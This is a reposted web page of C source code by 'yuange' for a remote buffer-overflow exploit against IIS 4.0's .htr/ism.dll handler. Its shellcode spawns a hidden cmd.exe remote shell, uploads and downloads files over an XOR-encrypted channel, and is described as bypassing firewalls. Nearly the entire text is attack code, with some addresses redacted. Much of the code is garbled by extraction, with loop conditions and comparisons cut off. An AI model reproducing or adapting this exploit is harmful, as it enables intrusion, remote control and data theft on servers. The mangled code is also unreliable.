| 关键词: nbsp buff lockintvar int char filename lBytesRead shellcodefnadd server imgbase |
/*----------------------------------------------------------*//* IIS4.0的.htr映射ism.dll溢出攻击程序 *//* 编写:yuange([email protected]) *//* 本程序实现所有语言版本WINDOWS下的溢出攻击。 *//* SHELLCODE代码实现绑定cmd.exe功能,实现上传、 *//* 下传文件的ftp功能,实现加密传输功能,不开 *//* 端口、不开服务,可以绕过防火墙等。独创的实 *//* 现源代码编写shellcode的办法,可以方便编写、 *//* 修改、调试shellcode,使得编写强大功能的 *//* shellcode成为可能。也解决了溢出攻击的几个根 *//* 本问题:1、溢出点确定;2、shellcode定位; *//* 3、jmp esp功能代码地址确定;4、WINDOWS的API *//* 调用地址版本相关问题。另一个版本实现了接管 *//* WWW功能,可以实现不修改WEB页面文件的情况下替 */ /* 换所有WEB页面。 *//* 一般的溢出攻击程序也可以使用这个框架 *//* *//* 程序在vc6.0下编译通过 *//*----------------------------------------------------------*/ /* iis4。0 overflow program ver 1.0 copy by yuange 2000。05。8*/ #include #include #include #include #define FNENDLONG 0x08#define NOPCODE 'B' // INC EDX 0x90#define NOPLONG 0x50#define BUFFSIZE 0x20000#define PATHLONG 0x12// c:\inetpub\wwwroot 物理路径长度。// 因为WWW处理GET /的时候前面要加物理路径,再传递给ISM.DLL处理,所以溢出点与物理路径有// 关。可以先用.IDC,.ida,.idq泄露物理路径的办法得到物理路径长度 #define RETEIPADDRESS 0xxxxx-PATHLONG+4+4#define ADD1 0xxxx-0xxxxx-PATHLONG+4#define ADD2 0xxxxx-0xxxxx-PATHLONG+4/* 由于一些原因,这儿数据不提供 2000.10.25 */ // 两个要处理的参数地址,参见后面ISM.DLL有问题代码的注释 #define SHELLBUFFSIZE 0x800 #define SHELLFNNUMS 12#define DATAXORCODE 0xAA#define LOCKBIGNUM 19999999#define LOCKBIGNUM2 13579139#define WEBPORT 80 void shellcodefnlock();void shellcodefn(char *ecb);void cleanchkesp(char *fnadd,char *shellbuff,char *chkespadd ,int len);void iisput(int fd,char *str);void iisget(int fd,char *str);int newrecv(int fd,char *buff,int size,int flag);int newsend(int fd,char *buff,int size,int flag); int xordatabegin;int lockintvar1,lockintvar2;char lockcharvar; int main(int argc, char **argv){ char *server; char *str="LoadLibraryA""\x0""CreatePipe""\x0" "CreateProcessA""\x0""CloseHandle""\x0" "PeekNamedPipe""\x0" "ReadFile""\x0""WriteFile""\x0" "CreateFileA""\x0" "GetFileSize""\x0" "GetLastError""\x0" "Sleep""\x0" "cmd.exe""\x0""\x0d\x0a""exit""\x0d\x0a""\x0" "XORDATA""\x0" "strend"; char buff1[]="GET /""\xff""default.htr/"; char buff2[]=".HTR HTTP/1.1 \nHOST:"; char *fnendstr="\x90\x90\x90\x90\x90\x90\x90\x90\x90"; char SRLF[]="\x0d\x0a\x00\x00"; char eipexcept1[] ="\xxx\xxx\xxx\xxx";// char eipexcept[] ="\xxx\xxx\xxx\xxx"; // ret char eipexcept[]="\xxx\xxx\xxx\xxx"; char eipwinnt[] ="\xxx\xxx\xxx\xxx"; char eipwinnt2[]="\xxx\xxx\xxx\xxx"; char reteax[] ="\xxx\xxx\xxx\xxx"; /* 由于一些原因,这儿数据不提供 2000.10.25 */ char eipjmpshell[]="\x90\x90\x90\x90\xff\x63\x64"; char buff[BUFFSIZE]; char recvbuff[BUFFSIZE]; char shellcodebuff[0x1000]; struct sockaddr_in s_in2,s_in3; struct hostent *he; char *shellcodefnadd,*chkespadd; unsigned int sendpacketlong; int i,j,k; unsigned char temp; int fd; u_short port,port1,shellcodeport; SOCKET d_ip; WSADATA wsaData; int offset=0; int OVERADD=RETEIPADDRESS; int result; fprintf(stderr,"\n IIS4.0 OVERFLOW PROGRAM 2.0 ."); fprintf(stderr,"\n copy by yuange([email protected]) 2000.6.2."); fprintf(stderr,"\n welcome to my homepage http://yuange.yeah.net/ ."); fprintf(stderr,"\n welcome to http://www.nsfocus.com/ ."); fprintf(stderr,"\n usage: %s [offset] [webport] \n", argv[0]); if(argc fprintf(stderr,"\n please enter the web server:"); gets(recvbuff); for(i=0;i if(recvbuff[i]!=' ') break; } server=recvbuff; if(i fprintf(stderr,"\n please enter the offset(0-3):"); gets(buff); for(i=0;i if(buff[i]!=' ') break; } offset=atoi(buff+i); } result= WSAStartup(MAKEWORD(1, 1), &wsaData); if (result != 0) { fprintf(stderr, "Your computer was not connected " "to the Internet at the time that " "this program was launched, or you " "do not have a 32-bit " "connection to the Internet."); exit(1); } if(argc>2){ offset=atoi(argv[2]); } OVERADD+=offset; /* if(offset3){ fprintf(stderr,"\n offset error !offset 0 - 3 ."); gets(buff); exit(1); } */ if(argc // WSACleanup( ); // exit(1); } else server = argv[1]; for(i=0;i if(server[i]!=' ') break; } if(i for(i=0;i+3 if(server[i]==':'){ if(server[i+1]=='\\'||server[i+1]=='/'){ if(server[i+2]=='\\'||server[i+2]=='/'){ server+=i; server+=3; break; } } } } for(i=1;i if(server[i-1]=='\\'||server[i-1]=='/') server[i-1]=0; } d_ip = inet_addr(server); if(d_ip==-1){ he = gethostbyname(server); if(!he) { WSACleanup( ); printf("\n Can't get the ip of %s !\n",server); gets(buff); exit(1); } else memcpy(&d_ip, he->h_addr, 4); } if(argc>3) port=atoi(argv[3]); else port=WEBPORT; if(port==0) port=WEBPORT; fd = socket(AF_INET, SOCK_STREAM,0); i=8000; setsockopt(fd,SOL_SOCKET,SO_RCVTIMEO,(const char *) &i,sizeof(i)); s_in3.sin_family = AF_INET; s_in3.sin_port = htons(port); s_in3.sin_addr.s_addr = d_ip; printf("\n nuke ip: %s port %d",inet_ntoa(s_in3.sin_addr),htons(s_in3.sin_port)); if(connect(fd, (struct sockaddr *)&s_in3, sizeof(struct sockaddr_in))!=0) { closesocket(fd); WSACleanup( ); fprintf(stderr,"\n connect err."); gets(buff); exit(1);} _asm{ mov ESI,ESP cmp ESI,ESP } _chkesp(); chkespadd=_chkesp; temp=*chkespadd; if(temp==0xe9) { ++chkespadd; i=*(int*)chkespadd; chkespadd+=i; chkespadd+=4; } shellcodefnadd=shellcodefnlock; temp=*shellcodefnadd; if(temp==0xe9) { ++shellcodefnadd; k=*(int *)shellcodefnadd; shellcodefnadd+=k; shellcodefnadd+=4; } for(k=0;k if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break; } memset(buff,NOPCODE,BUFFSIZE); if(argc>4){ memcpy(buff,argv[4],strlen(argv[4])); } else memcpy(buff,buff1,strlen(buff1)); memcpy(buff+OVERADD+NOPLONG,shellcodefnadd+k+4,0x80); shellcodefnadd=shellcodefn; temp=*shellcodefnadd; if(temp==0xe9) { ++shellcodefnadd; k=*(int *)shellcodefnadd; shellcodefnadd+=k; shellcodefnadd+=4; } for(k=0;k if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break; } memcpy(shellcodebuff,shellcodefnadd,k); cleanchkesp(shellcodefnadd,shellcodebuff,chkespadd,k); for(i=0;i if(memcmp(str+i,"strend",6)==0) break; } memcpy(shellcodebuff+k,str,i); sendpacketlong=k+i; for(k=0;k if(memcmp(buff+OVERADD+NOPLONG+k,fnendstr,FNENDLONG)==0) break; } for(i=0;i temp=shellcodebuff[i]; temp^=DATAXORCODE; if(temp buff[OVERADD+NOPLONG+k]='0'; ++k; temp+=0x40; } buff[OVERADD+NOPLONG+k]=temp; ++k;} // memcpy(buff+OVERADD+NOPLONG+k,shellcodebuff,sendpacketlong);// k+=sendpacketlong; for(i=-0x30;i memcpy(buff+ADD1+offset+i,eipexcept,4); memcpy(buff+ADD2+offset+i,eipexcept,4); } for(i=-0x30;i memcpy(buff+OVERADD+i,eipexcept,4); } memcpy(buff+OVERADD+i,eipwinnt2,4); memcpy(buff+OVERADD+i+4,reteax,4); memcpy(buff+OVERADD+i+8,eipwinnt,4); memcpy(buff+OVERADD+i+0x0c,eipwinnt,4); memcpy(buff+OVERADD+i+0x10,eipjmpshell,7); // fprintf(stderr,"\n send:\n %s",buff); fprintf(stderr,"\n offset:%d",offset);/* if(argc>2){ server=argv[2]; if(strcmp(server,"win9x")==0){ memcpy(buff+OVERADD,eipwin9x,4); fprintf(stderr,"\n nuke win9x."); } if(strcmp(server,"winnt")==0){ memcpy(buff+OVERADD,eipwinnt,4); fprintf(stderr,"\n nuke winnt."); } } */ sendpacketlong=k+OVERADD+NOPLONG;strcpy(buff+sendpacketlong,buff2);strcpy(buff+sendpacketlong+strlen(buff2),server);strcpy(buff+sendpacketlong+strlen(buff2)+strlen(server),"\n\n");// printf("\n send buff:\n%s",buff);// strcpy(buff+OVERADD+NOPLONG,shellcode); sendpacketlong=strlen(buff); /*#ifdef DEBUG _asm{ lea esp,buff add esp,OVERADD ret }#endif */ if(argc>6){ if(strcmp(argv[6],"debug")==0){ _asm{ lea esp,buff add esp,OVERADD ret } } } xordatabegin=0; for(i=0;i j=sendpacketlong; fprintf(stderr,"\n send packet %d bytes.",j); send(fd,buff,j,0); k=newrecv(fd,recvbuff,0x1000,0); if(k>=8&&memcmp(recvbuff,"XORDATA",8)==0) { xordatabegin=1; k=-1; fprintf(stderr,"\n ok!\n"); } if(k>0){ recvbuff[k]=0; fprintf(stderr,"\n recv:\n %s",recvbuff); } } k=1; ioctlsocket(fd, FIONBIO, &k); // fprintf(stderr,"\n now begin: \n"); lockintvar1=LOCKBIGNUM2%LOCKBIGNUM; lockintvar2=lockintvar1; k=1; while(k!=0){ if(k i=0; while(i==0){ gets(buff); if(memcmp(buff,"iisput",6)==0){ iisput(fd,buff+6); } else{ if(memcmp(buff,"iisget",6)==0){ iisget(fd,buff+6); } else i=1; } } k=strlen(buff); memcpy(buff+k,SRLF,3); newsend(fd,buff,k+2,0); } k=newrecv(fd,buff,0x1000,0); if(xordatabegin==0&&k>=8&&memcmp(buff,"XORDATA",8)==0){ xordatabegin=1; k=-1; } if(k>0){ buff[k]=0; fprintf(stderr,"%s",buff); }// if(k==0) break; } closesocket(fd); WSACleanup( ); fprintf(stderr,"\n the server close connect."); gets(buff); return(0);} void shellcodefnlock(){ _asm{ nop nop nop nop nop nop nop nop _emit('?') xor ecx,ecx add si,474h cmp dword ptr [esi],ecx jnz getesi add si,4getesi: mov esi,[esi] add si,8 xor ecx,ecx mov byte ptr [esi],cl jmp nextgetediadd: pop EDI push EDI pop ESI push ebx // ecb push ebx // call shellcodefn ret address xor ecx,ecxlooplock: lodsb cmp al,cl jz shell cmp al,0x30 jz clean0sto: xor al,DATAXORCODE stosb jmp looplockclean0: lodsb sub al,0x40 jmp stonext: call getediaddshell: NOP NOP NOP NOP NOP NOP NOP NOP }} void shellcodefn(char *ecb){ char Buff[SHELLBUFFSIZE+2]; int *except[3]; FARPROC Sleepadd; FARPROC GetLastErroradd; FARPROC GetFileSizeadd; FARPROC CreateFileAadd; FARPROC WriteFileadd; FARPROC ReadFileadd; FARPROC PeekNamedPipeadd; FARPROC CloseHandleadd; FARPROC CreateProcessadd; FARPROC CreatePipeadd; FARPROC procloadlib; FARPROC apifnadd[1]; FARPROC procgetadd=0; FARPROC writeclient= *(int *)(ecb+0x84); FARPROC readclient = *(int *)(ecb+0x88); HCONN ConnID = *(int *)(ecb+8) ; char *stradd; int imgbase,fnbase,i,k,l; HANDLE libhandle,fpt; //libwsock32; STARTUPINFO siinfo; PROCESS_INformATION ProcessInformation; HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2; int lBytesRead; int lockintvar1,lockintvar2; char lockcharvar; SECURITY_ATTRIBUTES sa; _asm { jmp nextcall getstradd: pop stradd lea EDI,except mov eax,dword ptr FS:[0] mov dword ptr [edi+0x08],eax mov dword ptr FS:[0],EDI } except[0]=0xffffffff; except[1]=stradd-0x07; imgbase=0x77e00000; _asm{ call getexceptretadd } for(;imgbase imgbase+=0x10000; if(imgbase==0x78000000) imgbase=0xbff00000; if(*( WORD *)imgbase=='ZM'&& *(WORD *)(imgbase+*(int *)(imgbase+0x3c))=='EP'){ fnbase=*(int *)(imgbase+*(int *)(imgbase+0x3c)+0x78)+imgbase; k=*(int *)(fnbase+0xc)+imgbase; if(*(int *)k =='NREK'&&*(int *)(k+4)=='23LE'){ libhandle=imgbase; k=imgbase+*(int *)(fnbase+0x20); for(l=0;l if(*(int *)(imgbase+*(int *)k)=='PteG'&&*(int *)(4+imgbase+*(int *)k)=='Acor'){ k=*(WORD *)(l+l+imgbase+*(int *)(fnbase+0x24)); k+=*(int *)(fnbase+0x10)-1; k=*(int *)(k+k+k+k+imgbase+*(int *)(fnbase+0x1c)); procgetadd=k+imgbase; break; } } } } }// 搜索KERNEL32。DLL模块地址和API函数 GetProcAddress地址// 注意这儿处理了搜索页面不在情况。 _asm{ lea edi,except mov eax,dword ptr [edi+0x08] mov dword ptr fs:[0],eax } if(procgetadd==0) goto die ; for(k=1;k apifnadd[k]=procgetadd(libhandle,stradd); for(;;++stradd){ if(*(stradd)==0&&*(stradd+1)!=0) break; } ++stradd; } sa.nLength=12; sa.lpSecurityDescriptor=0; sa.bInheritHandle=TRUE; CreatePipeadd(&hReadPipe1,&hWritePipe1,&sa,0); CreatePipeadd(&hReadPipe2,&hWritePipe2,&sa,0); // ZeroMemory(&siinfo,sizeof(siinfo)); _asm{ lea EDI,siinfo xor eax,eax mov ecx,0x11 repnz stosd } siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES; siinfo.wShowWindow = SW_HIDE; siinfo.hStdInput = hReadPipe2; siinfo.hStdOutput=hWritePipe1; siinfo.hStdError =hWritePipe1;// k=0;// while(k==0){ k=CreateProcessadd(NULL,stradd,NULL,NULL,1,0,NULL,NULL,&siinfo,&ProcessInformation); stradd+=8;// } PeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0); k=8; writeclient(ConnID,stradd+9,&k,0); lockintvar1=LOCKBIGNUM2%LOCKBIGNUM; lockintvar2=lockintvar1; while(1){ PeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0); if(lBytesRead>0){ ReadFileadd(hReadPipe1,Buff,lBytesRead,&lBytesRead,0); if(lBytesRead>0){ for(k=0;k lockintvar2=lockintvar2*0x100; lockintvar2=lockintvar2%LOCKBIGNUM; lockcharvar=lockintvar2%0x100; Buff[k]^=lockcharvar; } writeclient(ConnID,Buff,&lBytesRead,0); } } else{ lBytesRead=SHELLBUFFSIZE; l=0; while(l==0){ k=readclient(ConnID,Buff,&lBytesRead); for(l=0;l lockintvar1=lockintvar1*0x100; lockintvar1=lockintvar1%LOCKBIGNUM; lockcharvar=lockintvar1%0x100; Buff[l]^=lockcharvar; } if(k==1&&lBytesRead>4&&Buff[0]=='p'&&Buff[1]=='u'&&Buff[2]=='t'&&Buff[3]==' '){ l=*(int *)(Buff+4);// WriteFileadd(fpt,Buff,lBytesRead,&lBytesRead,NULL); fpt=CreateFileAadd(Buff+0x8,FILE_FLAG_WRITE_THROUGH+GENERIC_WRITE,FILE_SHARE_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0) ; k=GetLastErroradd(); i=0; while(l>0){ k=readclient(ConnID,Buff,&lBytesRead); if(k==1){ if(lBytesRead>0){ for(k=0;k lockintvar1=lockintvar1*0x100; lockintvar1=lockintvar1%LOCKBIGNUM; lockcharvar=lockintvar1%0x100; Buff[k]^=lockcharvar; } l-=lBytesRead; WriteFileadd(fpt,Buff,lBytesRead,&lBytesRead,NULL); } } else{ Sleepadd(0100); ++i; } if(i>10000) l=0; } CloseHandleadd(fpt); l=0; } else{ if(k==1&&lBytesRead>4&&Buff[0]=='g'&&Buff[1]=='e'&&Buff[2]=='t'&&Buff[3]==' '){ fpt=CreateFileAadd(Buff+4,GENERIC_READ,FILE_SHARE_READ+FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0); Sleepadd(100); l=GetFileSizeadd(fpt,&k); *(int *)Buff='ezis'; //size *(int *)(Buff+4)=l; lBytesRead=8; for(i=0;i lockintvar2=lockintvar2*0x100; lockintvar2=lockintvar2%LOCKBIGNUM; lockcharvar=lockintvar2%0x100; Buff[i]^=lockcharvar; } writeclient(ConnID,Buff,&lBytesRead,0); // Sleepadd(100); i=0; while(l>0){ k=SHELLBUFFSIZE; ReadFileadd(fpt,Buff,k,&k,0); if(k>0){ for(i=0;i lockintvar2=lockintvar2*0x100; lockintvar2=lockintvar2%LOCKBIGNUM; lockcharvar=lockintvar2%0x100; Buff[i]^=lockcharvar; } i=0; l-=k; writeclient(ConnID,Buff,&k,0); // HSE_IO_SYNC);// Sleepadd(100); } else ++i; if(i>100) l=0; } CloseHandleadd(fpt); l=0; } else l=1; } } if(k!=1){ k=8; WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe while(1){ Sleepadd(0x7fffffff); //僵死 } } else{ WriteFileadd(hWritePipe2,Buff,lBytesRead,&lBytesRead,0);// Sleepadd(1000); } } } die: goto die ; _asm{ getexceptretadd: pop eax push eax mov edi,dword ptr [stradd] mov dword ptr [edi-0x0e],eax reterrprogram: mov eax,dword ptr [esp+0x0c] add eax,0xb8 mov dword ptr [eax],0x11223344 //stradd-0xe xor eax,eax //2 ret //1execptprogram: jmp errprogram //2 bytes stradd-7nextcall: call getstradd //5 bytes NOP NOP NOP NOP NOP NOP NOP NOP NOP } } void cleanchkesp(char *fnadd,char *shellbuff,char * chkesp,int len){ int i,k; unsigned char temp; char *calladd; for(i=0;i temp=shellbuff[i]; if(temp==0xe8){ k=*(int *)(shellbuff+i+1); calladd=fnadd; calladd+=k; calladd+=i; calladd+=5; if(calladd==chkesp){ shellbuff[i]=0x90; shellbuff[i+1]=0x43; // inc ebx shellbuff[i+2]=0x4b; // dec ebx shellbuff[i+3]=0x43; shellbuff[i+4]=0x4b; } } }} void iisput(int fd,char *str){ char *filename;char *filename2;FILE *fpt;char buff[0x2000];int size=0x2000,i,j,filesize,filesizehigh; filename="\0";filename2="\0";j=strlen(str);for(i=0;i if(*str!=' '){ filename=str; break; } }for(;i if(*str==' ') { *str=0; break; }}++i;++str;for(;i if(*str!=' '){ filename2=str; break; }}for(;i if(*str==' ') { *str=0; break; }} if(filename=="\x0") { printf("\n iisput filename [path\\fiename]\n"); return;}if(filename2=="\x0") filename2=filename; printf("\n begin put file:%s",filename); j=0;ioctlsocket(fd, FIONBIO, &j); Sleep(1000); fpt=CreateFile(filename,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0); filesize=GetFileSize(fpt,&filesizehigh);strcpy(buff,"put ");*(int *)(buff+4)=filesize;filesize=*(int *)(buff+4);strcpy(buff+0x8,filename2);newsend(fd,buff,i+0x9,0);printf("\n put file:%s to file:%s %d bytes",filename,filename2,filesize);Sleep(1000); while(filesize>0){ size=0x800; ReadFile(fpt,buff,size,&size,NULL); if(size>0){ newsend(fd,buff,size,0);// Sleep(0100); filesize-=size; }} CloseHandle(fpt);j=1;ioctlsocket(fd, FIONBIO, &j); printf("\n put file ok!\n");Sleep(1000); } void iisget(int fd,char *str){ char *filename;char *filename2;FILE *fpt;char buff[0x2000];int size=0x2000,i,j,filesize,filesizehigh; filename="\0";filename2="\0";j=strlen(str);for(i=0;i if(*str!=' '){ filename=str; break; } }for(;i if(*str==' ') { *str=0; break; }}++i;++str;for(;i if(*str!=' '){ filename2=str; break; }}for(;i if(*str==' ') { *str=0; break; }} if(filename=="\x0") { printf("\n iisget filename [path\\fiename]\n"); return;}if(filename2=="\x0") filename2=filename; printf("\n begin get file:%s",filename); fpt=CreateFileA(filename,FILE_FLAG_WRITE_THROUGH+GENERIC_WRITE,FILE_SHARE_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0); strcpy(buff,"get ");strcpy(buff+0x4,filename2);newsend(fd,buff,i+0x5,0);printf("\n get file:%s from file:%s",filename,filename2); j=0;ioctlsocket(fd, FIONBIO, &j); i=0;filesize=0; j=0;while(j// Sleep(100); i=newrecv(fd,buff,0x800,0); if(i>0){ buff[i]=0; if(memcmp(buff,"size",4)==0){ filesize=*(int *)(buff+4); j=100; } else { j=0; printf("\n recv %s",buff); } } else ++j;// if(j>1000) i=0;} printf("\n file %d bytes %d\n",filesize,i);if(i>8){ i-=8; WriteFile(fpt,buff+8,i,&i,NULL); filesize-=i;} while(filesize>0){ size=newrecv(fd,buff,0x800,0); if(size>0){ WriteFile(fpt,buff,size,&size,NULL); filesize-=size; } else { if(size==0) { printf("\n ftp close \n "); } else { printf("\n Sleep(100)"); Sleep(100); } } }CloseHandle(fpt);printf("\n get file ok!\n");j=1;ioctlsocket(fd, FIONBIO, &j);} int newrecv(int fd,char *buff,int size,int flag){ int i,k; k=recv(fd,buff,size,flag); if(xordatabegin==1){ for(i=0;i lockintvar1=lockintvar1*0x100; lockintvar1=lockintvar1%LOCKBIGNUM; lockcharvar=lockintvar1%0x100; buff[i]^=lockcharvar; } } return(k);} int newsend(int fd,char *buff,int size,int flag){ int i; for(i=0;i lockintvar2=lockintvar2*0x100; lockintvar2=lockintvar2%LOCKBIGNUM; lockcharvar=lockintvar2%0x100; buff[i]^=lockcharvar; } return(send(fd,buff,size,flag)); } |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|